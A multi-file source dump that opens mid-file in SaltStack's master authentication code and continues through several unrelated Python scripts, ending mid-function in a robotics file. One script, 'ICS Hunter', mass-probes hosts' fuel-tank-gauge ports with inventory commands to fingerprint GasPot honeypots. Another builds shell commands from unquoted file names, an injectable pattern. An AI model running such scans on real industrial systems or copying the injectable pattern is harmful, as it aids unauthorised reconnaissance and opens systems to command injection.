'2' and self.opts['pillar_version'] == 1: # Authorized to return old pillar proto return ret, {'fun': 'send'} return ret, {'fun': 'send_private', 'key': 'pillar', 'tgt': load['id']} # Encrypt the return return ret, {'fun': 'send'} class ClearFuncs(TransportMethods): ''' Set up functions that are safe to execute when commands sent to the master without encryption and authentication ''' # These methods will be exposed to the transport layer by # MWorker._handle_clear expose_methods = ( 'ping', 'publish', 'publish_batch', 'get_token', 'mk_token', 'wheel', 'runner', ) # The ClearFuncs object encapsulates the functions that can be executed in # the clear: # publish (The publish from the LocalClient) # _auth def __init__(self, opts, key): self.opts = opts self.key = key # Create the event manager self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Make a client self.local = salt.client.get_local_client(self.opts['conf_file']) # Make an minion checker object self.ckminions = salt.utils.minions.CkMinions(opts) # Make an Auth object self.loadauth = salt.auth.LoadAuth(opts) # Stand up the master Minion to access returner data self.mminion = salt.minion.MasterMinion( self.opts, states=False, rend=False, ignore_config_errors=True ) # Make a wheel object self.wheel_ = salt.wheel.Wheel(opts) # Make a masterapi object self.masterapi = salt.daemons.masterapi.LocalFuncs(opts, key) def runner(self, clear_load): ''' Send a master control function back to the runner system ''' # All runner ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': runner_check = self.ckminions.runner_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not runner_check: return {'error': {'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username)}} elif isinstance(runner_check, dict) and 'error' in runner_check: # A dictionary with an error name/message was handled by ckminions.runner_check return runner_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') runner_client = salt.runner.RunnerClient(self.opts) return runner_client.asynchronous(fun, clear_load.get('kwarg', {}), username, local=True) except Exception as exc: # pylint: disable=broad-except log.error('Exception occurred while introspecting %s: %s', fun, exc) return {'error': {'name': exc.__class__.__name__, 'args': exc.args, 'message': six.text_type(exc)}} def wheel(self, clear_load): ''' Send a master control function back to the wheel system ''' jid = clear_load.get('__jid__', salt.utils.jid.gen_jid(self.opts)) # All wheel ops pass through eauth auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(clear_load) # Authenticate auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) error = auth_check.get('error') if error: # Authentication error occurred: do not continue. data = {'error': error, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': error} # Authorize username = auth_check.get('username') if auth_type != 'user': wheel_check = self.ckminions.wheel_check( auth_check.get('auth_list', []), clear_load['fun'], clear_load.get('kwarg', {}) ) if not wheel_check: err_data = { 'name': err_name, 'message': 'Authentication failure of type "{0}" occurred for ' 'user {1}.'.format(auth_type, username) } data = {'error': err_data, 'jid': jid} self.event.fire_event(data, tagify([jid, "new"], "wheel")) return {'error': err_data} elif isinstance(wheel_check, dict) and 'error' in wheel_check: # A dictionary with an error name/message was handled by ckminions.wheel_check return wheel_check # No error occurred, consume sensitive settings from the clear_load if passed. for item in sensitive_load_keys: clear_load.pop(item, None) else: if 'user' in clear_load: username = clear_load['user'] if salt.auth.AuthUser(username).is_sudo(): username = self.opts.get('user', 'root') else: username = salt.utils.user.get_user() # Authorized. Do the job! try: fun = clear_load.pop('fun') tag = tagify(jid, prefix='wheel') data = {'fun': "wheel.{0}".format(fun), 'jid': jid, 'tag': tag, 'user': username} self.event.fire_event(data, tagify([jid, 'new'], 'wheel')) ret = self.wheel_.call_func(fun, full_return=True, **clear_load) data['return'] = ret['return'] data['success'] = ret['success'] self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} except Exception as exc: # pylint: disable=broad-except log.error('Exception occurred while introspecting %s: %s', fun, exc) data['return'] = 'Exception occurred in wheel {0}: {1}: {2}'.format( fun, exc.__class__.__name__, exc, ) data['success'] = False self.event.fire_event(data, tagify([jid, 'ret'], 'wheel')) return {'tag': tag, 'data': data} def mk_token(self, clear_load): ''' Create and return an authentication token, the clear load needs to contain the eauth key and the needed authentication creds. ''' token = self.loadauth.mk_token(clear_load) if not token: log.warning('Authentication failure of type "eauth" occurred.') return '' return token def get_token(self, clear_load): ''' Return the name associated with a token or False if the token is invalid ''' if 'token' not in clear_load: return False return self.loadauth.get_tok(clear_load['token']) def publish_batch(self, clear_load, minions, missing): batch_load = {} batch_load.update(clear_load) batch = salt.cli.batch_async.BatchAsync( self.local.opts, functools.partial(self._prep_jid, clear_load, {}), batch_load ) ioloop = salt.ext.tornado.ioloop.IOLoop.current() ioloop.add_callback(batch.start) return { 'enc': 'clear', 'load': { 'jid': batch.batch_jid, 'minions': minions, 'missing': missing } } def publish(self, clear_load): ''' This method sends out publications to the minions, it can only be used by the LocalClient. ''' extra = clear_load.get('kwargs', {}) publisher_acl = salt.acl.PublisherACL(self.opts['publisher_acl_blacklist']) if publisher_acl.user_is_blacklisted(clear_load['user']) or \ publisher_acl.cmd_is_blacklisted(clear_load['fun']): log.error( '%s does not have permissions to run %s. Please contact ' 'your local administrator if you believe this is in ' 'error.\n', clear_load['user'], clear_load['fun'] ) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Retrieve the minions list delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) _res = self.ckminions.check_minions( clear_load['tgt'], clear_load.get('tgt_type', 'glob'), delimiter ) minions = _res.get('minions', list()) missing = _res.get('missing', list()) ssh_minions = _res.get('ssh_minions', False) # Check for external auth calls and authenticate auth_type, err_name, key, sensitive_load_keys = self._prep_auth_info(extra) if auth_type == 'user': auth_check = self.loadauth.check_authentication(clear_load, auth_type, key=key) else: auth_check = self.loadauth.check_authentication(extra, auth_type) # Setup authorization list variable and error information auth_list = auth_check.get('auth_list', []) err_msg = 'Authentication failure of type "{0}" occurred.'.format(auth_type) if auth_check.get('error'): # Authentication error occurred: do not continue. log.warning(err_msg) return {'error': {'name': 'AuthenticationError', 'message': 'Authentication error occurred.'}} # All Token, Eauth, and non-root users must pass the authorization check if auth_type != 'user' or (auth_type == 'user' and auth_list): # Authorize the request authorized = self.ckminions.auth_check( auth_list, clear_load['fun'], clear_load['arg'], clear_load['tgt'], clear_load.get('tgt_type', 'glob'), minions=minions, # always accept find_job whitelist=['saltutil.find_job'], ) if not authorized: # Authorization error occurred. Do not continue. if auth_type == 'eauth' and not auth_list and 'username' in extra and 'eauth' in extra: log.debug('Auth configuration for eauth "%s" and user "%s" is empty', extra['eauth'], extra['username']) log.warning(err_msg) return {'error': {'name': 'AuthorizationError', 'message': 'Authorization error occurred.'}} # Perform some specific auth_type tasks after the authorization check if auth_type == 'token': username = auth_check.get('username') clear_load['user'] = username log.debug('Minion tokenized user = "%s"', username) elif auth_type == 'eauth': # The username we are attempting to auth with clear_load['user'] = self.loadauth.load_name(extra) # If we order masters (via a syndic), don't short circuit if no minions # are found if not self.opts.get('order_masters'): # Check for no minions if not minions: return { 'enc': 'clear', 'load': { 'jid': None, 'minions': minions, 'error': 'Master could not resolve minions for target {0}'.format(clear_load['tgt']) } } if extra.get('batch', None): return self.publish_batch(clear_load, minions, missing) jid = self._prep_jid(clear_load, extra) if jid is None: return {'enc': 'clear', 'load': {'error': 'Master failed to assign jid'}} payload = self._prep_pub(minions, jid, clear_load, extra, missing) # Send it! self._send_ssh_pub(payload, ssh_minions=ssh_minions) self._send_pub(payload) return { 'enc': 'clear', 'load': { 'jid': clear_load['jid'], 'minions': minions, 'missing': missing } } def _prep_auth_info(self, clear_load): sensitive_load_keys = [] key = None if 'token' in clear_load: auth_type = 'token' err_name = 'TokenAuthenticationError' sensitive_load_keys = ['token'] elif 'eauth' in clear_load: auth_type = 'eauth' err_name = 'EauthAuthenticationError' sensitive_load_keys = ['username', 'password'] else: auth_type = 'user' err_name = 'UserAuthenticationError' key = self.key return auth_type, err_name, key, sensitive_load_keys def _prep_jid(self, clear_load, extra): ''' Return a jid for this publication ''' # the jid in clear_load can be None, '', or something else. this is an # attempt to clean up the value before passing to plugins passed_jid = clear_load['jid'] if clear_load.get('jid') else None nocache = extra.get('nocache', False) # Retrieve the jid fstr = '{0}.prep_jid'.format(self.opts['master_job_cache']) try: # Retrieve the jid jid = self.mminion.returners[fstr](nocache=nocache, passed_jid=passed_jid) except (KeyError, TypeError): # The returner is not present msg = ( 'Failed to allocate a jid. The requested returner \'{0}\' ' 'could not be loaded.'.format(fstr.split('.')[0]) ) log.error(msg) return {'error': msg} return jid def _send_pub(self, load): ''' Take a load and send it across the network to connected minions ''' for transport, opts in iter_transport_opts(self.opts): chan = salt.transport.server.PubServerChannel.factory(opts) chan.publish(load) @property def ssh_client(self): if not hasattr(self, '_ssh_client'): self._ssh_client = salt.client.ssh.client.SSHClient(mopts=self.opts) return self._ssh_client def _send_ssh_pub(self, load, ssh_minions=False): ''' Take a load and send it across the network to ssh minions ''' if self.opts['enable_ssh_minions'] is True and ssh_minions is True: log.debug('Send payload to ssh minions') threading.Thread(target=self.ssh_client.cmd, kwargs=load).start() def _prep_pub(self, minions, jid, clear_load, extra, missing): ''' Take a given load and perform the necessary steps to prepare a publication. TODO: This is really only bound by temporal cohesion and thus should be refactored even further. ''' clear_load['jid'] = jid delimiter = clear_load.get('kwargs', {}).get('delimiter', DEFAULT_TARGET_DELIM) # TODO Error reporting over the master event bus self.event.fire_event({'minions': minions}, clear_load['jid']) new_job_load = { 'jid': clear_load['jid'], 'tgt_type': clear_load['tgt_type'], 'tgt': clear_load['tgt'], 'user': clear_load['user'], 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'minions': minions, 'missing': missing, } # Announce the job on the event bus self.event.fire_event(new_job_load, tagify([clear_load['jid'], 'new'], 'job')) if self.opts['ext_job_cache']: fstr = '{0}.save_load'.format(self.opts['ext_job_cache']) save_load_func = True # Get the returner's save_load arg_spec. try: arg_spec = salt.utils.args.get_function_argspec(self.mminion.returners[fstr]) # Check if 'minions' is included in returner's save_load arg_spec. # This may be missing in custom returners, which we should warn about. if 'minions' not in arg_spec.args: log.critical( 'The specified returner used for the external job cache ' '\'%s\' does not have a \'minions\' kwarg in the returner\'s ' 'save_load function.', self.opts['ext_job_cache'] ) except (AttributeError, KeyError): save_load_func = False log.critical( 'The specified returner used for the external job cache ' '"%s" does not have a save_load function!', self.opts['ext_job_cache'] ) if save_load_func: try: self.mminion.returners[fstr](clear_load['jid'], clear_load, minions=minions) except Exception: # pylint: disable=broad-except log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # always write out to the master job caches try: fstr = '{0}.save_load'.format(self.opts['master_job_cache']) self.mminion.returners[fstr](clear_load['jid'], clear_load, minions) except KeyError: log.critical( 'The specified returner used for the master job cache ' '"%s" does not have a save_load function!', self.opts['master_job_cache'] ) except Exception: # pylint: disable=broad-except log.critical( 'The specified returner threw a stack trace:\n', exc_info=True ) # Set up the payload payload = {'enc': 'aes'} # Altering the contents of the publish load is serious!! Changes here # break compatibility with minion/master versions and even tiny # additions can have serious implications on the performance of the # publish commands. # # In short, check with Thomas Hatch before you even think about # touching this stuff, we can probably do what you want to do another # way that won't have a negative impact. load = { 'fun': clear_load['fun'], 'arg': clear_load['arg'], 'tgt': clear_load['tgt'], 'jid': clear_load['jid'], 'ret': clear_load['ret'], } # if you specified a master id, lets put that in the load if 'master_id' in self.opts: load['master_id'] = self.opts['master_id'] # if someone passed us one, use that if 'master_id' in extra: load['master_id'] = extra['master_id'] # Only add the delimiter to the pub data if it is non-default if delimiter != DEFAULT_TARGET_DELIM: load['delimiter'] = delimiter if 'id' in extra: load['id'] = extra['id'] if 'tgt_type' in clear_load: load['tgt_type'] = clear_load['tgt_type'] if 'to' in clear_load: load['to'] = clear_load['to'] if 'kwargs' in clear_load: if 'ret_config' in clear_load['kwargs']: load['ret_config'] = clear_load['kwargs'].get('ret_config') if 'metadata' in clear_load['kwargs']: load['metadata'] = clear_load['kwargs'].get('metadata') if 'module_executors' in clear_load['kwargs']: load['module_executors'] = clear_load['kwargs'].get('module_executors') if 'executor_opts' in clear_load['kwargs']: load['executor_opts'] = clear_load['kwargs'].get('executor_opts') if 'ret_kwargs' in clear_load['kwargs']: load['ret_kwargs'] = clear_load['kwargs'].get('ret_kwargs') if 'user' in clear_load: log.info( 'User %s Published command %s with jid %s', clear_load['user'], clear_load['fun'], clear_load['jid'] ) load['user'] = clear_load['user'] else: log.info( 'Published command %s with jid %s', clear_load['fun'], clear_load['jid'] ) log.debug('Published command details %s', load) return load def ping(self, clear_load): ''' Send the load back to the sender. ''' return clear_load
all_to_utf8.py
""" Many subtitle files have weird ass encodings like SHIFT-JIS. This python script replaces every file it's piped with good 'ole UTF-8 . The biggest problem with this script is that chardetect can't === EXAMPLE USAGE: recursively converts everything in given directory: find ~/Dir/with/files/ -type f | python all_to_utf8.py """ import sys import os from tqdm import tqdm from multiprocessing import Process def to_utf8(fp, encodings): """Given a file path, converts that file in-place to utf-8 """ def get_charset(fp): """ detect encoding of a file """ # TODO - LOCKING ON head.tmp tmp = os.system('head %s > head.tmp' % fp) output = os.popen('chardetect head.tmp').read() os.system('rm head.tmp') charset = output.split(':')[1].strip().split(' ')[0] return charset.upper() # if that character set is supported by iconv, convert it try: charset = get_charset(fp) if charset in encodings: os.system('iconv -f %s -t UTF-8 "%s" > "%s"' % (charset, fp, fp + '.utf8')) os.system('mv "%s" "%s"' % (fp + '.utf8', fp)) print 'CONVERTED \n\t to "%s" \n\t encoding was: %s' % (fp, charset) else: raise Exception except Exception: print 'SKIPPED \n\t %s' % fp if __name__ == '__main__': # get supported encodings os.system('iconv -l > tmp') supported_encodings = [w.upper() for l in open('tmp').readlines() for w in l.strip().split()] # run concurrently MAX_PROCESSES = 4 processes = set() files = [line.strip() for line in sys.stdin] for file in tqdm(files): p = Process(target=to_utf8, args=(file, supported_encodings,)) p.start() processes.add(p) while len(processes) >= MAX_PROCESSES: processes.difference_update([p for p in processes if not p.is_alive()]) # cleanup os.system('rm tmp')
pfs.py
import logging import threading import time from dataclasses import dataclass from enum import Enum from typing import Dict, Iterable, List, Literal, Optional, Set, Union, cast from urllib.parse import urlparse from eth_typing import Address from eth_utils import encode_hex, to_canonical_address, to_checksum_address from hexbytes import HexBytes from requests.exceptions import ReadTimeout from synapse.config import ConfigError from synapse.handlers.presence import UserPresenceState from synapse.module_api import ModuleApi, run_in_background from synapse.types import UserID from web3 import Web3 from web3.exceptions import BlockNotFound, ExtraDataLengthError from raiden_contracts.constants import CONTRACT_SERVICE_REGISTRY, CONTRACTS_VERSION from raiden_contracts.contract_manager import get_contracts_deployment_info from raiden_contracts.utils.type_aliases import ChainID from raiden_synapse_modules.presence_router.blockchain_support import ( install_filters, read_initial_services_addresses, setup_contract_from_address, ) log = logging.getLogger(__name__) class WorkerType(Enum): MAIN = None FEDERATION_SENDER = "synapse.app.federation_sender" OTHER = "_other" @dataclass class PFSPresenceRouterConfig: service_registry_address: Optional[Address] ethereum_rpc: str blockchain_sync: int class PFSPresenceRouter: """An implementation of synapse.presence_router.PresenceRouter. Supports routing all presence to all registered service providers. Basic flow: - on startup - read all registered services - check for local service users - send ALL presences to local service users - every config.blockchain_sync_seconds - check for new filter hits (RegisteredService, Block) - on RegisteredService - update registered_services - recompile local service users - send ALL presences to new service users - on Block - check block.timestamp against next_expiry - on expired services - update registered_services - recompile local service users Args: config: A configuration object. module_api: An instance of Synapse's ModuleApi. """ def __init__(self, config: PFSPresenceRouterConfig, module_api: ModuleApi): self._module_api: ModuleApi = module_api self._config: PFSPresenceRouterConfig = config self.web3 = self.setup_web3() service_registry_address = self._config.service_registry_address if service_registry_address is None: chain_id = ChainID(self.web3.eth.chain_id) deployment_data = get_contracts_deployment_info( chain_id=chain_id, version=CONTRACTS_VERSION, ) assert ( deployment_data is not None ), f"Could not load deployment data for chain {chain_id}" service_registry_address = to_canonical_address( deployment_data["contracts"][CONTRACT_SERVICE_REGISTRY]["address"] ) self.registry = setup_contract_from_address(service_registry_address, self.web3) self.registered_services: Dict[Address, int] = read_initial_services_addresses( self.registry ) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) else: self.next_expiry = 0 self.local_users: List[UserID] = [] self.update_local_users() if self.worker_type is WorkerType.FEDERATION_SENDER: # The initial presence update only needs to be sent from within the # `federation_sender` worker process run_in_background( self.send_current_presences_to, self.local_users, ) block_filter, event_filter = install_filters(self.registry) self.block_filter = block_filter self.event_filter = event_filter thread = threading.Thread(target=self._check_filters, name="_check_filters") thread.start() log.debug("Module setup done") @property def worker_type(self) -> WorkerType: """Return the type of worker we're running in""" try: return WorkerType(self._module_api._hs.config.worker_app) except ValueError: return WorkerType.OTHER @staticmethod def parse_config(config_dict: dict) -> PFSPresenceRouterConfig: """Parse a configuration dictionary from the homeserver config, do some validation and return a typed PFSPresenceRouterConfig. Args: config_dict: The configuration dictionary. Returns: A validated config object. """ try: blockchain_sync = int(config_dict.get("blockchain_sync_seconds", "15")) except ValueError: raise ConfigError("`blockchain_sync_seconds` needs to be an integer") service_registry_address = config_dict.get("service_registry_address") if service_registry_address is not None: try: service_registry_address = to_canonical_address( to_checksum_address(service_registry_address) ) except (TypeError, ValueError): raise ConfigError("`service_registry_address` is not a valid address") try: ethereum_rpc = config_dict.get("ethereum_rpc") parsed_ethereum_rpc = urlparse(ethereum_rpc) if not all([parsed_ethereum_rpc.scheme, parsed_ethereum_rpc.netloc]): raise ValueError() except ValueError: raise ConfigError("`ethereum_rpc` is not properly configured") return PFSPresenceRouterConfig( service_registry_address, ethereum_rpc, blockchain_sync # type: ignore ) async def get_users_for_states( self, state_updates: Iterable[UserPresenceState], ) -> Dict[str, Set[UserPresenceState]]: """Given an iterable of user presence updates, determine where each one needs to go. Args: state_updates: An iterable of user presence state updates. Returns: A dictionary of user_id -> set of UserPresenceState that the user should receive. """ destination_users: Dict[str, Set[UserPresenceState]] = {} for user in self.local_users: destination_users[user] = set(state_updates) return destination_users async def get_interested_users(self, user_id: str) -> Union[Set[str], Literal["ALL"]]: """ Retrieve a list of users that `user_id` is interested in receiving the presence of. This will be in addition to those they share a room with. Optionally, the literal str "ALL" can be returned to indicate that this user should receive all incoming local and remote presence updates. Note that this method will only be called for local users. Args: user_id: A user requesting presence updates. Returns: A set of user IDs to return additional presence updates for, or "ALL" to return presence updates for all other users. """ if user_id in self.local_users: return "ALL" return set() def setup_web3(self) -> Web3: provider = Web3.HTTPProvider(self._config.ethereum_rpc) web3 = Web3(provider) try: web3.eth.getBlock("latest") except ExtraDataLengthError: from web3.middleware import geth_poa_middleware web3.middleware_onion.inject(geth_poa_middleware, layer=0) return web3 def _check_filters(self) -> None: while True: self._check_filters_once() time.sleep(self._config.blockchain_sync) def _check_filters_once(self) -> None: log.debug("Checking filters.") start = time.time() try: receipts = self.block_filter.get_new_entries() log.info(f"Got new block entries in {time.time() - start} seconds") registered_services = self.event_filter.get_new_entries() log.info(f"Got new event entries in {time.time() - start} seconds") except ReadTimeout: log.error( f"Connection error: check_filters timeout after {time.time() - start} seconds" ) return for receipt in receipts: blockhash = cast(HexBytes, receipt) self.on_new_block(blockhash) for registered_service in registered_services: self.on_registered_service( registered_service.args.service, # type: ignore registered_service.args.valid_till, # type: ignore ) self.last_update = time.time() log.info(f"Filters checked in {time.time() - start} seconds") async def send_current_presences_to(self, users: List[UserID]) -> None: """Send all presences to users.""" start = time.time() log.debug(f"Sending presences to {len(users)} users") await self._module_api.send_local_online_presence_to(users) log.info(f"Presences updated in {time.time() - start} seconds") def on_registered_service(self, service_address: Address, expiry: int) -> None: """Called, when there is a new RegisteredService event on the blockchain.""" # service_address is already known, update the expiry log.debug("New registered service {to_checksum_address(service_address)}") if service_address in self.registered_services: self.registered_services[service_address] = expiry # new service, add and send current presences else: self.registered_services[service_address] = expiry local_user = self.to_local_user(service_address) if local_user is not None: self.local_users.append(local_user) if self.worker_type is WorkerType.FEDERATION_SENDER: # The initial presence update only needs to be sent from within the # `federation_sender` worker process run_in_background( self.send_current_presences_to, [local_user], ) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) def on_new_block(self, blockhash: HexBytes) -> None: """Called, when there is a new Block on the blockchain.""" log.debug(f"New block {encode_hex(blockhash)}.") start = time.time() try: timestamp: int = self.web3.eth.getBlock(blockhash)["timestamp"] log.info(f"getBlock finished in {time.time() - start} seconds") if timestamp > self.next_expiry: self.expire_services(timestamp) if len(self.registered_services): self.next_expiry = min(self.registered_services.values()) except BlockNotFound: log.error(f"getBlock failed after {time.time() - start} seconds") log.debug(f"Block {encode_hex(blockhash)} not found.") def expire_services(self, timestamp: int) -> None: registered_services: Dict[Address, int] = {} for address, expiry in self.registered_services.items(): if expiry > timestamp: registered_services[address] = expiry self.registered_services = registered_services self.update_local_users() def update_local_users(self) -> None: """Probe all `self.registered_services` addresses for a local UserID and update `self.local_users` accordingly. """ local_users: List[UserID] = [] for address in self.registered_services.keys(): candidate = self.to_local_user(address) if candidate is not None: local_users.append(candidate) log.debug(f"Now {len(local_users)} users registered for presence updates.") self.local_users = local_users def to_local_user(self, address: Address) -> Optional[UserID]: """Create a UserID for a local user from a registered service address.""" log.debug(f"Creating UserID for address {to_checksum_address(address)}") user_id = self._module_api.get_qualified_user_id(str(to_checksum_address(address)).lower()) return user_id
ics.py
#!/usr/bin/python # -*- coding: utf-8 -*- import argparse import sys import threading import time import socket import xmltodict import json # from lib.payload.scanner.service.engine import recv_all COMMANDS = [ { "\x01I30100\n": ["9999FF1B"] }, { "\x01I20100\n": ["I20100", "IN-TANK INVENTORY"] } ] # https://github.com/sjhilt/GasPot/blob/master/config.ini.dist DEFAULT_SIGNATURES = [ "EXXON STATION\n 12 Fake St\n Anytown, MO 12346", "FUEL COOP", "SHELL STATION", "AMOCO FUELS", "MOBIL STATION", "MARATHON GAS", "CHEVRON STATION", "CITGO FUELS", "BP FUELS", "PILOT TRUCK STOP", "FLYING J TRUCK STOP", "LOVES FUEL STATION", "SINCLAIR FUEL", "VICTORY OIL", "CONOCO FUELS", "76 OIL", "TEXACO STATION", "PETRO-CANADA", "TOTAL PETROL", "HEM PETROL", "ARAL PETROL", "OBERT 24h", "AGIP PETROL", "ROMPETROL STATION", "PETRON STATION", "CIRCLE K STATION", "LUK OIL", "MURPHY OIL"] DEFAULT_PRODUCTS = ["SUPER", "UNLEAD", "DIESEL", "PREMIUM"] def recv_all(s, limit=4196): """ receive all data from a socket Args: s: python socket limit: limit size to get response Returns: response or b"" """ response = "" while len(response) < limit: try: r = s.recv(1) if r != b"": response += r.decode() else: break except Exception as _: break return response def info(msg, response=None, output=None): sys.stdout.write("[+] " + msg + "\n") if response and output: f = open(output, "a") f.write(json.dumps(response) + "\n") f.close() def sort_output(output, target_length): data = list(set(open(output).read().rsplit("\n"))) data_json = [] for res in data: if res.startswith("{"): data_json.append(json.loads(res)) info("{0}/{1} possible honeypot founds".format(len(data_json), target_length)) f = open(output, "w") f.write(json.dumps(data_json)) f.close() def first_ics_connect(target, port, timeout, output): __JSON_STRUCTURE = {"host": target} response = "" for CMD in COMMANDS: for CMD_NAME in CMD: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) s.connect((target, port)) s.send(CMD_NAME) response = recv_all(s, limit=1000000) FLAG = True for RES in CMD[CMD_NAME]: if RES not in response: FLAG = False __JSON_STRUCTURE[CMD_NAME] = FLAG except Exception as _: __JSON_STRUCTURE[CMD_NAME] = False if __JSON_STRUCTURE["\x01I20100\n"]: __JSON_STRUCTURE["I20100_RESPONSE"] = response FLAG = False for SIG in DEFAULT_SIGNATURES: if SIG in response: FLAG = True __JSON_STRUCTURE["DEFAULT_SIGNATURES"] = FLAG FLAG = True for PRD in DEFAULT_PRODUCTS: if PRD not in response: FLAG = False __JSON_STRUCTURE["DEFAULT_PRODUCTS"] = FLAG info("possible found honeypot {0}".format(target), response=__JSON_STRUCTURE, output=output) return def read_targets(filename): try: data = open(filename, "rb").read() except Exception as _: sys.exit(info("cannot open the file[{0}]".format(filename))) if filename.endswith(".xml"): loaded_data = json.loads(json.dumps(xmltodict.parse(data))) hosts = [] try: for tag in loaded_data["nmaprun"]["host"]: hosts.append(json.loads(json.dumps(json.loads(json.dumps(tag))["address"]))["@addr"]) except Exception as _: sys.exit(info("some error occurred while parsing targets from {0}".format(filename))) elif filename.endswith(".txt"): hosts = list(set(data.rsplit())) else: sys.exit(info("file extension not supported. (only .txt and .xml)")) if not len(hosts): sys.exit(info("no targets found in this file {0}".format(filename))) return hosts def clear_threads(threads): for thread in threads: try: thread._Thread__stop() except: pass def start(): parser = argparse.ArgumentParser(prog="ICS Hunter", add_help=False) engineOpt = parser.add_argument_group("Options") engineOpt.add_argument("-h", "--help", action="store_true", default=False, dest="help_menu", help="show this help menu") engineOpt.add_argument("-i", "--targets", action="store", dest="target", default=None, help="input targets (e.g. masscan-gaspot.xml, lists.txt)") engineOpt.add_argument("-p", "--port", action="store", dest="port", default=10001, type=int, help="port number") engineOpt.add_argument("-t", "--threads", action="store", dest="threads", default=500, type=int, help="max threads number") engineOpt.add_argument("-T", "--timeout", action="store", dest="timeout", default=3, type=int, help="timeout seconds") engineOpt.add_argument("-o", "--output", action="store", dest="output", default="results.json", help="output filename (e.g. results.json)") engineOpt.add_argument("-a", "--alert", action="store", dest="alert", default=1000, type=int, help="alert every x thread to show position") args = parser.parse_args() if len(sys.argv) <= 1 or "-h" in sys.argv or "--help" in sys.argv: parser.print_help() targets = read_targets(args.target) try: f = open(args.output, "w") f.write("") f.close() except: sys.exit(info("{0} is not writable!".format(args.output))) n = 1 BREAK = False threads = [] for target in targets: if n % args.alert is 0: info(str(n) + "/" + str(len(targets)) + "->" + target) thread = threading.Thread(target=first_ics_connect, args=(target, args.port, args.timeout, args.output)).start() threads.append(thread) while 1: try: if not threading.activeCount() - 1 >= args.threads: break time.sleep(0.01) except KeyboardInterrupt: BREAK = True break if BREAK: break n += 1 if int(n % 2000) is 0: time.sleep(args.timeout + 1) info("clearing cache") clear_threads(threads) info("cache cleaned") threads = [] time.sleep(args.timeout + 1) info("clearning cache") clear_threads(threads) info("cache cleaned") time.sleep(args.timeout + 1) sort_output(args.output, len(targets)) sys.exit(0) if __name__ == "__main__": start()
multiprocessing_import_main.py
import multiprocessing import multiprocessing_import_worker if __name__ == "__main__": jobs = [] for i in range(5): p = multiprocessing.Process(target=multiprocessing_import_worker.worker) jobs.append(p) p.start()
service.py
import falcon import scrapy import settings import logging import threading import subprocess import crawlthread import urllib2 from multiprocessing import Process, Queue from elasticsearch import Elasticsearch, helpers from scrapy.crawler import CrawlerRunner from scrapy.utils.log import configure_logging from twisted.internet import reactor from scrapy.crawler import CrawlerProcess from philomathspider import PhilomathSpider es = Elasticsearch(hosts = [settings.SEARCH_HOST]) class Philomath: def on_post(self, req, resp): if not es.indices.exists(settings.INDEX_NAME): es_request_body = { "settings" : { "number_of_shards": 1, "number_of_replicas": 0 } } es_response = es.indices.create(index = settings.INDEX_NAME, body = es_request_body) configure_logging() url = req.stream.read().decode('utf-8') decodedurl = urllib2.unquote(url).decode('utf8') already_indexed = es.exists(index=settings.INDEX_NAME,doc_type='philomathitem',id=decodedurl) if not already_indexed: logging.warning('not indexed') crawlerProcess=Process(target=crawlthread.crawl, kwargs={"url" : decodedurl}) crawlerProcess.start() crawlerProcess.join() else: logging.warning('already indexed') resp.status = falcon.HTTP_200 api = falcon.API() api.add_route('/url', Philomath())
dal_ros_aml.py
#!/usr/bin/env python from __future__ import print_function import rospy import actionlib from move_base_msgs.msg import * from utils import * from random_box_map import * from sensor_msgs.msg import LaserScan from nav_msgs.msg import Odometry from geometry_msgs.msg import PoseStamped, Twist from tf.transformations import * import numpy as np from scipy import ndimage, interpolate from collections import OrderedDict import pdb import glob import os import multiprocessing import errno import re import time import random import cv2 from recordtype import recordtype import torch import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable from torch.optim.lr_scheduler import ReduceLROnPlateau, StepLR import torchvision from torchvision import transforms from torchvision.models.densenet import densenet121, densenet169, densenet201, densenet161 # from logger import Logger from copy import deepcopy from networks import policy_A3C from resnet_pm import resnet18, resnet34, resnet50, resnet101, resnet152 from torchvision.models.resnet import resnet18 as resnet18s from torchvision.models.resnet import resnet34 as resnet34s from torchvision.models.resnet import resnet50 as resnet50s from torchvision.models.resnet import resnet101 as resnet101s from torchvision.models.resnet import resnet152 as resnet152s from networks import intrinsic_model import math import argparse from datetime import datetime from maze import generate_map import matplotlib.pyplot as plt import matplotlib.colors as cm from matplotlib.patches import Wedge import matplotlib.gridspec as gridspec class bcolors: HEADER = '\033[95m' OKBLUE = '\033[94m' OKGREEN = '\033[92m' WARNING = '\033[93m' FAIL = '\033[91m' ENDC = '\033[0m' BOLD = '\033[1m' UNDERLINE = '\033[4m' def shift(grid, d, axis=None, fill = 0.5): grid = np.roll(grid, d, axis=axis) if axis == 0: if d > 0: grid[:d,:] = fill elif d < 0: grid[d:,:] = fill elif axis == 1: if d > 0: grid[:,:d] = fill elif d < 0: grid[:,d:] = fill return grid def softmax(w, t = 1.0): e = np.exp(np.array(w) / t) dist = e / np.sum(e) return dist def softermax(w, t = 1.0): w = np.array(w) w = w - w.min() + np.exp(1) e = np.log(w) dist = e / np.sum(e) return dist def normalize(x): if x.min() == x.max(): return 0.0*x x 